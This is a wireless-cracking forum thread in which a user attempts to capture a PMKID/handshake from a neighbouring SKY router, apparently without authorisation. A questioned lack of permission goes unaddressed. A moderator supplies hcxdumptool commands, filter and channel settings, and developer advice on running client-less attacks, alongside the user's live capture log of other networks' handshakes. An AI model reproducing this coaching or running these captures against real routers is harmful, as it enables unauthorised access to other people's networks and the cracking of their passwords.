NEW: We have a Discord server now. Click here to go there now!

NOTE: Why not use our List Manager to crack your lists? Its easy and enables better management.

NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - SKY router, tried PMKID, EAPOL- nothing :(


9 Results - Page 1 of 1 -
1
Author Message
Avatar
Monica

Status: n/a
Joined: Fri, 21 Sep 2018
Posts: 35
Team:
Reputation: 0 Reputation
Offline
Mon, 24 Sep 2018 @ 14:37:52

Hey,
I have this strong signal sky router nearby but there are no clients and i have tried for few days but i cannot catch pmkid,

Im using the same methods that work elsewere, but must admit never captured any sky before.

Is there something that im missing ?

for hxcxdumptool my filter contains only one entry (the sky target) but i pick up pmkid from other stations i dont understand why ..

Is there any point to listen longer then a day with it ? seems hopeless


Avatar
meso

Status: Banned
Joined: Wed, 19 Sep 2018
Posts: 25
Team:
Reputation: 0 Reputation
Offline
Mon, 24 Sep 2018 @ 14:43:47

WARNING! User is BANNED and maybe a SCAMMER.

Monica said:


Is there something that im missing ?

permition?


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 3618
Team:
Reputation: 10343 Reputation
Online
Mon, 24 Sep 2018 @ 15:05:59

Monica said:

Hey,
I have this strong signal sky router nearby but there are no clients and i have tried for few days but i cannot catch pmkid,

Im using the same methods that work elsewere, but must admit never captured any sky before.

Is there something that im missing ?

for hxcxdumptool my filter contains only one entry (the sky target) but i pick up pmkid from other stations i dont understand why ..

Is there any point to listen longer then a day with it ? seems hopeless


Is the target access point in transmit range?

Command: "hcxdumtool -i physical_interface --do_rcascan -t 5"
[21:18:00] xxxxxxxxxxxx networkname [CHANNEL 1, AP IN RANGE]


XMPP: freeroute@xmpp.jp
General rules | Paid section rules

Avatar
Monica

Status: n/a
Joined: Fri, 21 Sep 2018
Posts: 35
Team:
Reputation: 0 Reputation
Offline
Mon, 24 Sep 2018 @ 20:43:28

says AP IN RANGE for needed bssid


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 3618
Team:
Reputation: 10343 Reputation
Online
Mon, 24 Sep 2018 @ 21:54:10


Correct filterlist entry (112233445566)?
--filterlist=file : mac filter list
format: 112233445566 + comment
maximum line lenght 255, maximum entries 64

Correct filtermode (--filtermode=)2?
--filtermode=digit : mode for filter list
1: use filter list as protection list (default)
2: use filter list as target list

Channel set to ap channel (-c 1)?
-c digit : set scanlist (1,2,3,...)
default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12
maximum entries: 127
allowed channels:
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64
100, 104, 108, 112, 116, 120, 124, 128, 132,
136, 140, 144, 147, 149, 151, 153, 155, 157
161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216

Maybe the AP isn't vulnerable against PMKID attack?

Are the other received PMKIDs from client-less attack? That should not(!) happen if the filterlist and filtermode is ok!


XMPP: freeroute@xmpp.jp
General rules | Paid section rules

Avatar
Monica

Status: n/a
Joined: Fri, 21 Sep 2018
Posts: 35
Team:
Reputation: 0 Reputation
Offline
Mon, 24 Sep 2018 @ 22:48:41

root@kali:~# hcxdumptool -o lolsky4 -i wlan0mon --filterlist=lolsky.txt --filtermode=2 --enable_status=1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 1 entries
MAC CLIENT...............: fcc233c94ffc
MAC ACCESS POINT.........: 10b7133ab040 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64482
ANONCE...................: cf269386c67e6b63425bf1135f5cd405869df241a0ad1160ae7a6f121f397f6e

[16:13:58 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND PMKID]
[16:14:00 - 013] f46bef397a70 -> f02765758e90 [FOUND PMKID]
[16:19:10 - 007] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[16:41:02 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 5084]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND PMKID]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3909]
[17:04:12 - 008] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:11:44 - 006] 18a6f75f8606 -> 54bd7917d708 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 6258]
[17:11:44 - 006] 28f366122f3d -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:13:31 - 011] 88a6c6082cf4 -> dc56e76f9ed4 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 4615]
INFO: cha=9, rx=482935, rx(dropped)=24079, tx=3381, powned=7, err=0


Thats how it looks like right now, It does recognize my filter list as valid (with one entry)
filterlist was creadet with :
echo "123456789012">lolsky.txt

I was wondering about setting a fixed channel, but none of the tutorils suggested it, dont think that'll help though

I have had success obtaining pmkid from other stations this way, there were always "other" found pmkids in there though, which i do find strange

I cant tell if thise are clientless ..


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 3618
Team:
Reputation: 10343 Reputation
Online
Mon, 24 Sep 2018 @ 23:06:43

Thanks for the data.
I have to think, take some time.

By the way.
Note: INTERFACE:...............: wlan0mon
Is it a virtual interface? (You should use physical interface in monitor mode.)

Have you tried to capture it without filterlist, filtermode?

Edited: Maybe the AP isn't vulnerable against PMKID attack.


XMPP: freeroute@xmpp.jp
General rules | Paid section rules

Avatar
Monica

Status: n/a
Joined: Fri, 21 Sep 2018
Posts: 35
Team:
Reputation: 0 Reputation
Offline
Tue, 25 Sep 2018 @ 01:14:33

I have Kali linux inside VMware virtual machone, and usb wifi connected to it. Dont think it would work on wlan0 directly, must be monitor mode..

I have not tried without filters/filterlist, barely know what im doing here, following the step-by-step guides

WOudl that be how it looks like when ap is not vulnerble ? wh do i catch all these other pmkid's ?

thanks for your help


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 3618
Team:
Reputation: 10343 Reputation
Online
Tue, 25 Sep 2018 @ 08:39:52

We got support from the developer of hcxtools/hcxdumtool. I share it with you.

The filter list works like expected:

[16:13:58 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND PMKID]
[16:14:00 - 013] f46bef397a70 -> f02765758e90 [FOUND PMKID]
[16:19:10 - 007] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[16:41:02 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 5084]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND PMKID]
[16:50:48 - 011] 88a6c6082cf4 -> 98ca33c360ae [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3909]
[17:04:12 - 008] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:11:44 - 006] 18a6f75f8606 -> 54bd7917d708 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 6258]
[17:11:44 - 006] 28f366122f3d -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:13:31 - 011] 88a6c6082cf4 -> dc56e76f9ed4 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 4615]

The PMKIDs/handshakes are received only and not retrieved by an active attack.

This ones are all received (passive). None of them came from an active attack. hcxdumptool will show you the result of an active attack in this way:


passive attack:
[16:13:58 - 011] 88a6c6082cf4 -> a46cf1322a78 [FOUND PMKID]

active attack
[16:13:58 - 011] 88a6c6082cf4 -> fcc233faa144 [FOUND PMKID CLIENT-LESS]

This one (18a6f75f8606) must be the target ap in the filter list, because hcxdumptool is attacking it:
[17:04:12 - 008] 54bd7917d708 -> 18a6f75f8606 [EAPOL 4/4 - M4 RETRY ATTACK]
[17:11:44 - 006] 18a6f75f8606 -> 54bd7917d708 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 6258]

and hcxdumptool received a handshake from the AP.
The AP must be close to hcxdumptool, because the attack runs over overlapped channels. It would be nice to get a cap file to see if the AP supports PMKID caching.

You should try to run hcxdumptool without using a filter list to see if you will get a client-less PMKID or an AP-less handshake. If that works, we can say that the target AP isn't vulnerable.

Note: wlan0mon isn't a good idea because it will leed to some unexpected results, because you share(!) the physical interface.
If you create a logical interface, you will have 2 (or more) interfaces working on the same hardware. This can lead to performance drops and unwanted results/crashes.
A logical interface is just a normal interface, unless you use it in combination, in which case having to shift between
different channels, or having to share a single channel, cuts the throughput by (roughly) a factor of 1/N, where N is
the number of interfaces on the same physical device.

You can do a nice test to see how hcxdumptool get access to the interface:
Stop NetworkManager and wpa-supplicant.
Use ip and iw to set interface to monitor mode.
Run wireshark on that interface and start capturing of packets.
Now run hcxdumptool and you can see that hcxdumptool disconnect wireshark from the physical interface.
That will not work if wireshark is on the physical interface and hcxdumptool on a virtual interface.

About filterlist: The filter list is only used for the transmit branch. That means we do not send packets to the entries.
The receive remains unfiltered. That means we receive everything which is transmitted by other access points and clients.


XMPP: freeroute@xmpp.jp
General rules | Paid section rules


9 Results - Page 1 of 1 -
1

We have a total of 212138 messages in 26015 topics.
We have a total of 23009 registered users.
Our newest registered member is Francescafalk.